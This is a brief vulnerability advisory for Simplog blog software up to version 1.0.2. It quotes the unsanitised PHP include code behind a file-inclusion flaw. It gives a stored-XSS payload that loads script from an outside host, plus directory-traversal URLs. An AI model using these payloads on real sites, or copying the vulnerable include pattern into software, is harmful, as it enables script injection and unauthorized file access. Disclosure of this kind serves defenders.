Simplog <= 1.0.2 Vulnerabilities

[retard@xxxxxxxxxx]

ORIGIONAL SOURCE: http://notlegal.ws/simplogsploit.txt

???summary
        software: simplog
        vendors website: http://daverave.64digits.com/home.php?page=simplog
        versions: <= 1.0.2
        class: remote
        status: unpatched
        exploit: available
        solution: not available
        discovered by: retard and jim
        risk level: medium

??? description
        simplog does not sanatise blog posts allowing users to insert
        html into posts causing a xss vulnerability. also, the application
        uses global variables for includes allowing users to include 
        other .txt files than the inteded target
        
        in index.php:
42      $act = $_GET['act']; 
43      if ($act == '')
44      {
45      include("blog.txt");
46      }
47      else
48      {
49      include("act/$act.txt");
50      } 

??? exploit(s)
        xss:
        make any of your blog posts contain a script like below
        <SCRIPT SRC=http://notlegal.ws/xss.js></SCRIPT>

        directory transversal:
        http://example.com/index.php?act=blog&blogid=../somefile
        http://example.com/index.php?act=../somefile

??? credit
        author(s): retard and jim
        email: retard@xxxxxxxxxx